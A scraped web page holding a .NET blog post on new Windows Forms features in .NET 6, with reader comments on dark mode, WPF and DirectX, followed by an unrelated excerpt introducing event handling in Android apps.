class Program { [STAThread] static void Main() { ApplicationConfiguration.Initialize(); Application.Run(new Form1()); } } (C#, .NET 6.0 and above) as it would look at runtime:
(We know, the form in the designer still has that Windows 7 look, We’re working on it…)
Please note that Visual Basic handles these application-wide default values differently. In .NET 6.0 Visual Basic introduces a new application event
ApplyApplicationDefaults which allows you to define application-wide settings (e.g.,
HighDpiMode or the default font) in the typical Visual Basic way. The designer support for the default font configured via MSBuild properties is also coming in the near future. For more details head over to the dedicated Visual Basic blog post discussing what’s new in Visual Basic.
Template updates
As mentioned above we have updated our C# templates in line with related changes in .NET workloads, Windows Forms templates for C# have been updated to support
global using directives, file-scoped namespaces, and nullable reference types. Because a typical Windows Forms app requires a
STAThread attribute and consist of multiple types split across multiple files (e.g.,
Form1.cs and
Form1.Designer.cs) the top-level statements are notably absent from the Windows Forms templates. However, the updated templates do include the application bootstrap code.
More runtime designers
We have completed porting missing designers and designer-related infrastructure that enable building a general-purpose designer (e.g., a report designer). For more details refer to our earlier announcement.
If you think we missed a designer that your application depends on, please let us know at our GitHub repository.
High DPI and scaling fixes
We’ve been working through the high DPI space with the aim to get Windows Forms applications to correctly support PerMonitorV2 mode out of the box. It is a challenging undertaking, and sadly we couldn’t achieve as much as we’d hoped. Still in this release we made some progress, and we now can:
- Create controls in the same DPI awarenes as the application
- Correctly scale
ContainerControls and MDI child windows in PerMonitorV2 mode in most scenarios. There are still few specific scenarios (e.g., anchoring) and controls (e.g.,
MonthCalendar) where the experience remains subpar.
Other notable changes
- New overloads for
Control.Invoke()and
Control.BeginInvoke()methods that take
Actionand
Func<T>and allow writing more modern and concise code.
- New
Control.IsAncestorSiteInDesignModeAPI is complimentary to
Component.DesignMode, and indicates if one of the ancestors of this control is sited, and that site in design mode. A dedicated blog post exploring this API is coming later, so stay tuned.
- Windows 11 style default tooltip behavior makes the tooltip remain open when mouse hovers over it, and not disappear automatically. The tooltip can be dismissed by CONTROL or ESCAPE keys.
Community contributions
We’d like to call out a few community contributions:
- @paul1956 updated
NotifyIcon.Textlimits text to 127 (dotnet/winforms#4363).
- @weltkante enhanced
FolderBrowserDialogwith
InitialDirectoryand
ClientGuidproperties in dotnet/winforms#4645.
- @weltkante added link span to
LinkClickedEventArgs(dotnet/winforms#4708) making it easier to migrate
RichTextBoxfunctionality targeting RichEdit v3.0 or below that relied on hidden text to render hyperlinks.
- @AraHaan updated the good old
MessageBoxwith two new buttons
Try Againand
Continue, and made it possible to show four buttons at the same time (dotnet/winforms#4746):
- @kant2002 was helping us making Windows Forms runtime more ILLink/NativeAOT-friendlier by adding ComWrappers and removing redundant RCWs. (dotnet/winforms#5174 and dotnet/winforms#4971).
- @kirsan31 provided the ability to anchor minimized MDI children to TopLeft to match Windows MFC behavior in dotnet/winforms#5221.!
Bravo!
“We know, the form in the designer still has that Windows XP look, We’re working on it…” – did you mean Windows 7? cause Windows XP never had that look…
Also, please add native dark mode to WinForms applications!
Thank you, fixed. It’s been awhile since I used either.
The team is acutely aware of the desire for the theming of Win32 apps, unfortunately it has dependencies on Windows API, and there are challenges resolving this. We’re actively engaged with our partners in Windows but don’t have an ETA at this time.
To elaborate, I believe the main challenge is that Windows still does not have a documented way to check whether the system is in light or dark mode. Please correct me if I’m wrong about that.
Yes, this is one of the issues.
Congrats to everyone on the WinForms team for a great release! The per monitor high DPI work sounds especially challenging, and it’s totally understandable that it’ll take time to cover all the nuances.
Is there a roadmap ahead for .NET 7? The top feature for me would be to re-enable support for the Data Sources window. Being able to drag and drop classes from that window, and have the controls automatically created and data bound is a huge time saver.
Thank you.
Yes, there is a roadmap, and we plan to make it public in the near future. In the nutshell making high DPI work out of the box is very high on our priority list.
You can keep an eye on the .NET 7.0 milestone (which is a “catch all” at the moment, but we keep reviewing it).
I totally echo what Igor says here, and I’d also encourage you to keep an eye out for a similar post talking about WinForms Designer in VS2022. We’ve added some features around data that I think you might like 😁. Our first VS related blogpost should be published sometime next month.
I don’t know, it would have been nice to have the high DPI fixes in the long term release. It was clear at the start of the .NET6 development cycle that HDPI support in winforms is a desaster. Once you have monitors with different DPIs each, the default framework windows/forms/controls start to look and behave like total junk.
it WPF dead ? there no news from .net 5/6 side
The lack of .NET 6 specific news for WPF does not mean it is dead; alot of the hard work that went into porting WPF to .NET Core happened back during the .NET Core 3.* release. When Microsoft ported WPF+WinForms to .NET Core, they probably had to leave a lot out for WinForms initially, and they’re now finally getting around to it this release.
Microsoft did recently open source the unit testing suite for WPF:
alot of the hard work that went into porting WPF to .NET Core
Done on .Net core 3. There was no work on this on .Net core 5 or .Net 6. You can look the commit on github. There is no commit on this.
Microsoft did recently open source the unit testing suite for WPF
Officially that on what they work on for the last 3 years (Again you can read all the commit done the last three years. It may seems like a big job but there is less thant one real commit a month so it will be quick). No work on anythinks else. Except in visual studio with the new designer and some improvement on intellisense for xaml.
Yes it is. Look at the new roadmap for 2022. There is no new stuff coming, no improvements. And meanwhile ALL community PRs which adds new code are left
completely unreviewed. On some of them the authors have just closed the PR because after more than half a year there was no activity from the “WPF team”.
As I inferred from some talks, there is a shared team for xaml UI. There are plenty of work done for WinUI this year, and many things are still on backlog. I’m afraid there’s no enough people to work on WPF.
It would be nice if they would fix bugs first, before adding new stuff.
Visual Inheritance is still a nightmare in the designer, please finally fix that.
good news
Special thanks to Paul M Cohen @ paul 1956
Is it possible that WinForm supports Linux?
There are no official plans to support other OS than Windows.
Windows 11 supports
Use AvalonaUI, it’s very good.
Form Designer in release VS 2022 works much better, it was way too slow I checked it last time some months ago. Thank you.
Is there any special reason why Toolbox shows Framework custom controls disabled for Net 6.0 project? My Net 6.0 app uses some my controls from Net Framework 4.5 dll. When added to the form by the code, the controls seem work just fine, both in design- and run-time. The only problem is that Toolbox shows them grayed out. I see no clear reason for that: once I can manage the controls on the form (copy/paste them, change properties, delete) why can’t they be dragged from Toolbox?
Thank you for the update/blog, but still no mention of DirectX 11 or 12 or (13 for 2022) native support in .NET 6. I still don’t understand why Microsoft are avoiding DirectX in .NET? From a competitive standpoint, we have Vulkan for Java via LWJGL – Khronos.
MDX, XNA, SharpDX, SlimDX are all dead in the water
DirectX still seems to be exclusive to C++ (not C++.NET) … I don’t see how keeping DirectX restricted to a very a narrow development base as being good for Microsoft?
Cheers, Rob.
You can take a look at TerraFX. , That library also has Vulkan if you want it.
|
https://devblogs.microsoft.com/dotnet/whats-new-in-windows-forms-in-net-6-0/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Solution for Why I can’t change font in Label, but in Button i can (Tkinter.ttk)
is Given Below:
Well, as in topic, why I can’t change font in Label using ttkbootstrap, but in Buttons everything works fine?
And second question, is there some documentation that lists all of the things that I can change in ttk stylesheet? Like eg background color (as in ttkbootstrap is somehow done), because everywhere I searched, was mentioned ’bout background which only changed a “frame” of a button.
Here’s a problematic code:
import tkinter as tk from ttkbootstrap import Style as StyleBs import tkinter.ttk as ttk cfg = { "args_label" : { "style" : "TLabel", "text" : "Label 12345", }, "args_button" : { "style" : "TButton", "text" : "Button 12345", }, } if __name__ == "__main__" : root = tk.Tk() style = StyleBs("darkly") style.configure('TButton', font=('Times New Roman', 21), foreground = "red") # foreground is changed, font too style.configure('TLabel', font=('Times New Roman', 21), foreground = "red") # foreground is changed, but font is not button = ttk.Button(root, **cfg["args_button"], ).grid(row=0, column = 0) label = ttk.Label(root, **cfg["args_label"], ).grid(row=1, column = 0) root.mainloop()
The following code worked for me, if you import Style from tkinter instead of ttk.bootstrap you may have an easier time.
I’m not sure why the button and label text, as well the style names were in a dictionary, that’s new on me.
By removing the dictionary and simply placing the desired text and style name inside the button and label builds, it’ll meet your requirements.
from tkinter import Tk, Button, Label, ttk from tkinter.ttk import Style root = Tk() #Assigning variable to Style import style = ttk.Style() #Building Button and Label in window button = ttk.Button(root, text="Button 12345", style="ButtonStyle.TButton").grid(row=0, column = 0) label = ttk.Label(root, text="Label 12345", style="LabelStyle.TLabel").grid(row=1, column = 0) #Configuring style to be used by window style.configure('ButtonStyle.TButton', font=('Times New Roman', 21), foreground='red') style.configure('LabelStyle.TLabel', font = ('Times New Roman', 21), foreground = 'red') root.mainloop()
|
https://codeutility.org/why-i-cant-change-font-in-label-but-in-button-i-can-tkinter-ttk/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
PROBLEM LINK
Contest
Author: Adithi Narayan
Tester: Hareesh
Editorialist: Adithi Narayan
DIFFICULTY
Easy
PREREQUISITES
BFS
PROBLEM
Given a grid where each cell holds a direction [T,L,D,R], find the path from top left to bottom right given that you can either move in the direction specified in the cell or pay a penalty to move in some other direction. (Note that for a cell in the grid the change of direction can only be done once.)
EXPLANATION
We have to reach
(m - 1, n - 1) from
(0, 0) with a path that minimizes the penalty paid. For each cell, you have 2 choices:
- The cell that can be reached by following the direction [say L]
- Three other cells that can be reached via the other directions [say T, D and R]
Thus we have 1 edge of weight
0 and 3 edges of weight
1 [as we incur a penalty]. The problem now reduces to a simple path finding problem. The default choice of algorithm to solve this would be Dijkstra’s but it’s time complexity is
O(E + V log V).
However, if we notice the constraints we can see that the edges are binary weighted. We can either follow the directions to reach the cell with cost 0 or change the direction and incur a penalty of 1. So, we can use a more efficient algorithm: 0-1 BFS which uses a deque and has the time complexity of
O(E + V)
In the normal BFS, we do the following changes:
- If the adjacent cell has a cost of 0 [following direction], append it to the left of the queue else append the cell to the right
- Always pop the node at the left
This makes sure that we visit all nodes of a lower cost difference before moving on to the ones with a higher cost difference.
Setter's Solution
from collections import deque def minCost(grid, m, n): q = deque([[0, 0]]) dirp = [[-1, 0], [1, 0], [0, -1], [0, 1]] dirv = ['T', 'D', 'L', 'R'] vis = set([]) res = 0 while q: t = q[0] q.popleft() ci, cj = t[0]//n, t[0] % n if t[0] not in vis: res = t[1] vis.add(t[0]) if ci == m-1 and cj == n-1: return res for i, dv in enumerate(dirp): x, y = ci+dv[0], cj+dv[1] p = x*n + y if x < 0 or x >= m or y < 0 or y >= n or (p in vis): continue q.appendleft([p, t[1]]) if i == dirv.index( grid[ci][cj]) else q.append([p, t[1]+1]) return res m, n = map(int, input().split()) print(minCost([input().split() for i in range(m)], m, n))
|
https://discuss.codechef.com/t/chaat7-editorial/95548
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Layout callback in custom view classes
@omz, I know you are busy, but I have sort of mentioned this before, but not as a topic on its own. But the layout callback method when you create a custom class that inherits from ui.View, gets 2 callbacks when a view loads. I normally have to make another class member and store the last screen size to avoid a single redundant call to layout. Maybe there is a good reason it's called twice and a better way to avoid executing the layout code twice.
It's not a big deal, but worth mentioning for 1.6 if it is indeed a redundant call.
Or the old MadonnaView workaround...
import ui class MadonnaView(ui.View): def __init__(self): self.first_time = True def layout(self): if self.first_time: self.first_time = False return
Thanks @ccc. Was really about pointing that it happens so it could be addressed in 1.6 if it has not been already.
I still use the screen size to check, just in case double calls made in different circumstances.
- MartinPacker
phuket, do you have a simple example that calls layout twice? i tried with the most basic example, and thst doesn't happen...
perhaps you are setting the frame after you instantiate (rather than within the constructor)?
- MartinPacker
@JonB, you are right. I wasn't setting the h,w in the init method, but inside the layout method. And maybe this was my misunderstanding about presenting a sheet. I thought I had to do that before to be device independent. If I presented a view using sheet, I had no idea what the resulting size would be on different screen sizes. ( I remember a long time ago, I asked about this here).
I can see with 1.6, you can look at the screen size and determine what you want your view size to be before you call your class to present. Of course, this is only an issue with presenting with a sheet. As you can control the exact size of your sheet view with 1.6, no reason why the size of the view can't be set in the init method.
I hope what I said is correct. My mind is spinning. I did so many tests. But if the view is sized in the init method, no double layout calls. Makes sense.
|
https://forum.omz-software.com/topic/2094/layout-callback-in-custom-view-classes/?
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Introduction
In the previous episode of the Building Minicli series, we have refactored the initial version of
minicli to support commands defined in classes, with an architecture that uses Command Controllers.
In this new guide, we are going to implement Command Namespaces to organize Controllers and create a standard directory structure and naming conventions that can be leveraged for autoloading commands during application boot. This is a common approach used in web PHP frameworks to facilitate app development and reduce the amount of code necessary when bootstrapping a new application.
Our refactoring will go over the following steps:
- Implement the new
CommandNamespaceclass and refactor
CommandRegistryaccordingly.
- Outsource command parsing to a new
CommandCallclass.
- Update the
Appclass to support the changes.
- Update the abstract
CommandControllerclass and the concrete controllers in order to support the rest of the work.
- Update and run the
minicliscript.
This is Part 3 of the Building Minicli series.
Before Getting Started
You'll need
php-cli and Composer to follow this tutorial. You are strongly encouraged to start with the first tutorial in this series and then move through the second part before following this guide.
In case you want a clean base copy of
minicli to follow this tutorial, download version
0.1.2 of erikaheidi/minicli to bootstrap your setup:
wget unzip 0.1.2.zip cd minicli
Then, run Composer to set up autoload. This won't install any package, because
minicli has no dependencies.
composer dump-autoload
Run the application with:
php minicli
or
chmod +x minicli ./minicli
1. Implementing Command Namespaces
In the current application design, each command is an individual Controller. This is a nice way to keep commands organized and under a "contract", instead of having multiple commands all mixed together in a single Controller. This is how the demo controller
HelloController looks like:
<?php namespace App\Command; use Minicli\CommandController; class HelloController extends CommandController { public function run($argv) { $name = isset ($argv[2]) ? $argv[2] : "World"; $this->getApp()->getPrinter()->display("Hello $name!!!"); } }
Our current
CommandRegistry keeps a record of Command Controllers that are manually registered when bootstrapping the application. The
getCallable method is responsible for figuring out what callable needs to be executed by the application:
public function getCallable($command_name) { $controller = $this->getController($command_name); if ($controller instanceof CommandController) { return [ $controller, 'run' ]; } $command = $this->getCommand($command_name); if ($command === null) { throw new \Exception("Command \"$command_name\" not found."); } return $command; }
The problem with this approach is that it can get quite messy and confusing for users if you have many commands that are related to each other but with completely different names.
We want to implement common command entry points to keep related commands organized. Take the example of
docker:
docker image [ import | build | history | ls | pull | prune ... ] docker container [ build | info | kill | pause | rename | rm ... ]
The
image command serves as a common namespace for all commands that deal with Docker images. The same is valid for
container and other Docker commands.
We'll create a new
CommandNamespace class that will keep a registry of application Controllers under a common name. We'll then modify the
CommandRegistry class to work directly with Command Namespaces, and leave the work of registering and loading Controllers to these new entities. To expand the new design even further while simplifying application bootstrap, we will implement a standard directory structure that will facilitate autoloading Command Namespaces and Controllers into the application.
This is how our new architecture will look like:
app/Command └── Command1 ├── DefaultController.php ├── OtherController.php └── AnyController.php └── Command2 └── AnotherController.php └── Command3 └── RandomController.php ...
This is an expressive way of organizing commands while also facilitating automatic loading, which reduces the amount of code you have to write in order to include new commands into the application. Each Controller is a new subcommand under the designated Namespace. The name of each subcommand is obtained from the Controller class name, and the DefaultController is automatically used when no subcommand is provided in the command call. A directory structure like that would yield the following command "map":
./minicli command1 [ other | any ] ./minicli command2 another ./minicli command3 random
Let's start by creating the new
CommandNamespace class.
The
CommandNamespace Class
Open a new file at
minicli/lib/CommandNamespace using your code editor of choice.
lib/CommandNamespace.php
The
CommandNamespace class will have a name and an array containing Controllers mapped into subcommands.
The
loadControllers method will leverage the standard directory structure and naming conventions we defined to create a map of all Controllers under that namespace.
Copy the following code to your
CommandNamespace class:
<?php namespace Minicli; class CommandNamespace { protected $name; protected $controllers = []; public function __construct($name) { $this->name = $name; } public function getName() { return $this->name; } public function loadControllers($commands_path) { foreach (glob($commands_path . '/' . $this->getName() . '/*Controller.php') as $controller_file) { $this->loadCommandMap($controller_file); } return $this->getControllers(); } public function getControllers() { return $this->controllers; } public function getController($command_name) { return isset($this->controllers[$command_name]) ? $this->controllers[$command_name] : null; } protected function loadCommandMap($controller_file) { $filename = basename($controller_file); $controller_class = str_replace('.php', '', $filename); $command_name = strtolower(str_replace('Controller', '', $controller_class)); $full_class_name = sprintf("App\\Command\\%s\\%s", $this->getName(), $controller_class); /** @var CommandController $controller */ $controller = new $full_class_name(); $this->controllers[$command_name] = $controller; } }
Save the file when you're done.
The
CommandRegistry class
Open the existing
CommandRegistry class on your editor:
lib/CommandRegistry.php
The
CommandRegistry class will now outsource to Command Namespaces the work of registering and locating Controllers. Because the application implements a standard directory structure and naming conventions, we can locate all Command Namespaces currently defined - this is done in the
autoloadNamespaces method.
To keep compatibility with single commands registered via anonymous functions, which can be very handy and facilitate single-command apps, we will keep a
default_registry array to register commands that way, too. Another important change is that we now have a
getCallableController in addition to
getCallable. The Application will decide which one to use, and when.
This is how the updated
CommandRegistry class looks like:
<?php namespace Minicli; class CommandRegistry { protected $commands_path; protected $namespaces = []; protected $default_registry = []; public function __construct($commands_path) { $this->commands_path = $commands_path; $this->autoloadNamespaces(); } public function autoloadNamespaces() { foreach (glob($this->getCommandsPath() . '/*', GLOB_ONLYDIR) as $namespace_path) { $this->registerNamespace(basename($namespace_path)); } } public function registerNamespace($command_namespace) { $namespace = new CommandNamespace($command_namespace); $namespace->loadControllers($this->getCommandsPath()); $this->namespaces[strtolower($command_namespace)] = $namespace; } public function getNamespace($command) { return isset($this->namespaces[$command]) ? $this->namespaces[$command] : null; } public function getCommandsPath() { return $this->commands_path; } public function registerCommand($name, $callable) { $this->default_registry[$name] = $callable; } public function getCommand($command) { return isset($this->default_registry[$command]) ? $this->default_registry[$command] : null; } public function getCallableController($command, $subcommand = null) { $namespace = $this->getNamespace($command); if ($namespace !== null) { return $namespace->getController($subcommand); } return null; } public function getCallable($command) { $single_command = $this->getCommand($command); if ($single_command === null) { throw new \Exception(sprintf("Command \"%s\" not found.", $command)); } return $single_command; } }
Save the file when you're done updating its content.
2. Outsourcing Command Parsing to the
CommandCall Class
To facilitate parsing commands, subcommands and other parameters, we'll create a new class named
CommandCall.
Open a new file:
lib/CommandCall.php
The
CommandCall class works as a simple abstraction to the command call and provides a way to parse named parameters, such as
user=name.
It is handy because it keeps these values in a typed object that gives us more control over what is forwarded to the commands controllers. It can be expanded in the future for more complex parsing.
The
CommandCall class
Copy the following contents to your new
CommandCall class:
<?php namespace Minicli; class CommandCall { public $command; public $subcommand; public $args = []; public $params = []; public function __construct(array $argv) { $this->args = $argv; $this->command = isset($argv[1]) ? $argv[1] : null; $this->subcommand = isset($argv[2]) ? $argv[2] : 'default'; $this->loadParams($argv); } protected function loadParams(array $args) { foreach ($args as $arg) { $pair = explode('=', $arg); if (count($pair) == 2) { $this->params[$pair[0]] = $pair[1]; } } } public function hasParam($param) { return isset($this->params[$param]); } public function getParam($param) { return $this->hasParam($param) ? $this->params[$param] : null; } }
Save the file when you're done.
3. Updating the
App Class
To accommodate the changes in the
CommandRegistry, we'll need to also update the
App class. Open the file with:
lib/App.php
The
runCommand method now will first call the
getCallableController method in the
CommandRegistry class; if a controller is found, it will execute three distinct methods in this order:
boot,
run, and
teardown. If a controller can't be found, it probably means that namespace doesn't exist, and it's actually a single command. We'll try to find a single command and run its respective callable, otherwise the app will exit with an error.
There's also a new
app_signature property that lets us customize a one-liner to tell people how to use the app.
The
App Class
Following, the contents of the updated
App class:
<?php namespace Minicli; class App { protected $printer; protected $command_registry; protected $app_signature; public function __construct() { $this->printer = new CliPrinter(); $this->command_registry = new CommandRegistry(__DIR__ . '/../app/Command'); } public function getPrinter() { return $this->printer; } public function getSignature() { return $this->app_signature; } public function printSignature() { $this->getPrinter()->display(sprintf("usage: %s", $this->getSignature())); } public function setSignature($app_signature) { $this->app_signature = $app_signature; } public function registerCommand($name, $callable) { $this->command_registry->registerCommand($name, $callable); } public function runCommand(array $argv = []) { $input = new CommandCall($argv); if (count($input->args) < 2) { $this->printSignature(); exit; } $controller = $this->command_registry->getCallableController($input->command, $input->subcommand); if ($controller instanceof CommandController) { $controller->boot($this); $controller->run($input); $controller->teardown(); exit; } $this->runSingle($input); } protected function runSingle(CommandCall $input) { try { $callable = $this->command_registry->getCallable($input->command); call_user_func($callable, $input); } catch (\Exception $e) { $this->getPrinter()->display("ERROR: " . $e->getMessage()); $this->printSignature(); exit; } } }
Save the file when you're done updating its content.
4. Refactoring Abstract and Concrete Command Controllers
Now it's time to update the abstract class that is inherited by our Controllers, in order to include a few handy methods to retrieve parameters and to work as shortcut for accessing Application components such as the Printer.
Open the
CommandController class:
lib/CommandController.php
Under the new "contract" , Controllers will have to implement a method named
handle. Externally, nothing will change:
run is still the public method that will be executed from the
App class. The change is to enable intercepting the
CommandCall data and make it available for all protected controller methods.
The
teardown method is optional and for that reason is empty, so it can be overwritten in children controllers.
The
CommandController Class
Following, the contents of the updated
CommandController abstract class:
<?php namespace Minicli; abstract class CommandController { protected $app; protected $input; abstract public function handle(); public function boot(App $app) { $this->app = $app; } public function run(CommandCall $input) { $this->input = $input; $this->handle(); } public function teardown() { // } protected function getArgs() { return $this->input->args; } protected function getParams() { return $this->input->params; } protected function hasParam($param) { return $this->input->hasParam($param); } protected function getParam($param) { return $this->input->getParam($param); } protected function getApp() { return $this->app; } protected function getPrinter() { return $this->getApp()->getPrinter(); } }
Save the file when you're done updating its content.
We'll need to move our current
hello command to follow the designated directory structure:
cd minicli mkdir app/Command/Hello
Because we now use a
command subcommand nomenclature, we'll have to create a subcommand inside the
hello namespace. To create a subcommand named
name, you should use
NameController as class name.
Let's copy the
HelloController to the
hello namespace and rename it to
NameController.php.
mv app/Command/HelloController.php app/Command/Hello/NameController.php
Now we need to update this file to rename the class and implement the
handle method, removing the old
run implementation. Open file with:
app/Hello/NameController.php
The
NameController Class
Folowing, the contents of the updated
NameController class, former
HelloController.
<?php namespace App\Command\Hello; use Minicli\CommandController; class NameController extends CommandController { public function handle() { $name = $this->hasParam('user') ? $this->getParam('user') : 'World'; $this->getPrinter()->display(sprintf("Hello, %s!", $name)); } }
Save the file when you're done updating its content.
5. Updating and running
minicli
The last thing we need to do is update the
minicli script to reflect all the changes. We'll set a signature and register a single
help command to test out our named parameters feature.
Open the file with:
cd minicli nano minicli
The
minicli Script
Replace the current contents of your
minicli script with the following code:
#!/usr/bin/php <?php if (php_sapi_name() !== 'cli') { exit; } require __DIR__ . '/vendor/autoload.php'; use Minicli\App; use Minicli\CommandCall; $app = new App(); $app->setSignature("minicli hello name [ user=name ]"); $app->registerCommand("help", function(CommandCall $call) use ($app) { $app->printSignature(); print_r($call->params); }); $app->runCommand($argv);
Save the file when you're done.
8. Testing the Changes
Now you can execute the
hello name command with:
./minicli hello name
or
./minicli hello name user=erika
To test named parameters, run:
./minicli help name=value name2=value2
You'll get output like this:
usage: minicli hello name [ user=name ] Array ( [name] => value [name2] => value2 )
Conclusion
In this guide, we refactored our
minicli micro framework to support a better organizational command structure and to enable autoloading command controllers.
You can find the full refactored code in the 0.1.3 release of
minicli:.
In the next and final part of this series, we'll wrap up everything to release
minicli 1.0.
Discussion (5)
Hello you,
That's very great and usefull tutorial. It's a very trick that before articles, and it takes more in-deep to understand it, but, I've really learn a clean code structure.
Thanks for sharing!!
Thank you, I appreciate your feedback!
I loved it, thank you for sharing!
Thank you! 😊
Thanks, Erika.
Good article!
|
https://dev.to/erikaheidi/building-minicli-autoloading-command-namespaces-3ljm
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
2018-03-05
Announcing Dotty 0.6.0 and 0.7.0-RC1
Today, we are excited to release Dotty versions 0.6.0 and 0.7.0-RC1. These releases serve as a technology preview that demonstrates new language features and the compiler supporting them.
If you’re not familiar with Dotty, it's a platform to try out new language concepts and compiler technologies for Scala. The focus is mainly on simplification. We remove extraneous syntax (e.g. no XML literals), and try to boil down Scala’s types into a smaller set of more fundamental constructs. The theory behind these constructs is researched in DOT, a calculus for dependent object types. You can learn more about Dotty on our website.
This is our seventh scheduled release according to our 6-week release schedule. The previous technology preview focussed on bug fixes and stability work.
What’s new in the 0.7.0-RC1 technology preview?
Enum Simplification #4003
The previously introduced syntax and rules for enum were arguably too complex. We can considerably simplify them by taking away one capability: that cases can have bodies which can define members. Arguably, if we choose an ADT decomposition of a problem, it's good style to write all methods using pattern matching instead of overriding individual cases. So this removes an unnecessary choice. We now treat enums unequivocally as classes. They can have methods and other statements just like other classes can. Cases in enums are seen as a form of constructors. We do not need a distinction between enum class and enum object anymore. Enums can have companion objects just like normal classes can, of course.
Let's consider how
Option can be represented as an enum. Previously using an enum class:
enum class Option[+T] { def isDefined: Boolean } object Option { case Some[+T](x: T) { def isDefined = true } case None { def isDefined = false } def apply[T](x: T): Option[T] = if (x == null) None else Some(x) }
And now:
enum Option[+T] { case Some(x: T) case None def isDefined: Boolean = this match { case None => false case Some(_) => true } } object Option { def apply[T](x: T): Option[T] = if (x == null) None else Some(x) }
For more information about Enumerations and how to use them to model Algebraic Data Types, visit the respective sections in our documentation.
Erased terms #3342
The
erased modifier can be used on parameters,
val and
def to enforce that no reference to
those terms is ever used. As they are never used, they can safely be removed during compilation.
One particular use case is to add implicit type constraints that are only relevant at compilation
time. For example, let's consider the following implementation of
flatten.
class List[X] { def flatten[Y](implicit erased ev: X <:< List[Y]): List[Y] = { val buffer = new mutable.ListBuffer[Y] this.foreach(e => buffer ++= e.asInstanceOf[List[Y]]) buffer.toList } } List(List(1, 2), List(3)).flatten // List(1, 2, 3) List(1, 2, 3).flatten // error: Cannot prove that Int <:< List[Y]
The implicit evidence
ev is only used to constrain the type parameter
X of
List such that we
can safely cast from
X to
List[_]. The usage of the
erased modifier ensures that the evidence
is not used and can be safely removed at compilation time.
For more information, visit the Erased Terms section of our documentation.
Note: Erased terms replace phantom types: they have similar semantics, but with the added advantage that any type can be an erased parameter. See #3410.
Improved IDE support #3960
The Dotty language server now supports context sensitive IDE completions. Completions now include local and imported definitions. Members completions take possible implicit conversions into account.
We also improved the
find references functionality. It is more robust and much faster!
Try it out in Visual Studio Code!
Better and safer types in pattern matching (improved GADT support)
Consider the following implementation of an evaluator for a very simple
language containing only integer literals (
Lit) and pairs (
Pair):
sealed trait Exp case class Lit(value: Int) extends Exp case class Pair(fst: Exp, snd: Exp) extends Exp object Evaluator { def eval(e: Exp): Any = e match { case Lit(x) => x case Pair(a, b) => (eval(a), eval(b)) } eval(Lit(1)) // 1: Any eval(Pair(Pair(Lit(1), Lit(2)), Lit(3))) // ((1, 2), 3) : Any }
This code is correct but it's not very type-safe since
eval returns a value
of type
Any, we can do better by adding a type parameter to
Exp that
represents the result type of evaluating the expression:
sealed trait Exp[T] case class Lit(value: Int) extends Exp[Int] case class Pair[A, B](fst: Exp[A], snd: Exp[B]) extends Exp[(A, B)] object Evaluator { def eval[T](e: Exp[T]): T = e match { case Lit(x) => // In this case, T = Int x case Pair(a, b) => // In this case, T = (A, B) where A is the type of a and B is the type of b (eval(a), eval(b)) } eval(Lit(1)) // 1: Int eval(Pair(Pair(Lit(1), Lit(2)), Lit(3))) // ((1, 2), 3) : ((Int, Int), Int) }
Now the expression
Pair(Pair(Lit(1), Lit(2)), Lit(3))) has type
Exp[((Int, Int), Int)] and calling
eval on it will return a value of type
((Int, Int), Int) instead of
Any.
Something subtle is going on in the definition of
eval here: its result type
is
T which is a type parameter that could be instantiated to anything, and
yet in the
Lit case we are able to return a value of type
Int, and in the
Pair case a value of a tuple type. In each case the typechecker has been able
to constrain the type of
T through unification (e.g. if
e matches
Lit(x)
then
Lit is a subtype of
Exp[T], so
T must be equal to
Int). This is
usually referred to as GADT support in Scala since it closely mirrors the
behavior of Generalized Algebraic Data
Types in
Haskell and other languages.
GADTs have been a part of Scala for a long time, but in Dotty 0.7.0-RC1 we
significantly improved their implementation to catch more issues at
compile-time. For example, writing
(eval(a), eval(a)) instead of
(eval(a), eval(b)) in the example above should be an error, but it was not caught by
Scala 2 or previous versions of Dotty, whereas we now get a type mismatch error
as expected. More work remains to be done to fix the remaining GADT-related
issues,
but so far no show-stopper has been found.
Trying out Dotty
Scastie
Scastie, the online Scala playground, supports Dotty. This is an easy way to try Dotty without installing anything.
sbt
Using sbt 0.13.13 or newer, do:
sbt new lampepfl/dotty.g8
This will setup a new sbt project with Dotty as compiler. For more details on using Dotty with sbt, see the example project.
IDE support
It is very easy to.6.0..0.7.0-RC1 these are:
182 Martin Odersky 94 Nicolas Stucki 48 Olivier Blanvillain 38 liu fengyun 16 Allan Renucci 15 Guillaume Martres 11 Aggelos Biboudis 5 Abel Nieto 5 Paolo G. Giarrusso 4 Fengyun Liu 2 Georg Schmid 1 Jonathan Skowera 1 Fedor Shiriaev 1 Alexander Slesarenko 1 benkobalog 1 Jimin Hsieh.
|
http://dotty.epfl.ch/blog/2018/03/05/seventh-dotty-milestone-release.html
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
Prefetch normal module requests, causing them to be resolved and built before the first
import or
require of that module occurs. Using this plugin can boost performance. Try to profile the build first to determine clever prefetching points.
new webpack.PrefetchPlugin([context], request);
context: An absolute path to a directory
request: A request string for a normal module
|
https://webpack.js.org/plugins/prefetch-plugin/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
An Overview and Example of Android Event Handling
Much has been covered in the previous chapters relating to the design of user interfaces fo Android applications. An area that has yet to be covered, however, involves the way in which a user’s interaction with the user interface triggers the underlying activity to perform a task. In other words, we know from the previous chapters how to create a user interface containing a button view, but not how to make something happen within the application when it is touched by the user.
The primary objective of this chapter, therefore, is to provide an overview of event handling in Android applications. Once the basics of event handling have been covered, the next chapter will cover touch event handling in terms of detecting multiple touches and touch motion.
Understanding Android Events
Events in Android can take a variety of different forms, but are usually generated in response to an external action. The most common form of events, particularly for devices such as tablets and smartphones, involve some form of interaction with the touch screen. Such events fall into the category of input events.
The Android framework maintains an event queue into which events are placed as they occur. Events are then removed from the queue on a first-in, first-out (FIFO) basis. In the case of an input event such as a touch on the screen, the event is passed to the view positioned at the location on the screen where the touch took place. In addition to the event notification, the view is also passed a range of information (depending on the event type) about the nature of the event such as the coordinates of the point of contact between the user’s fingertip and the screen.
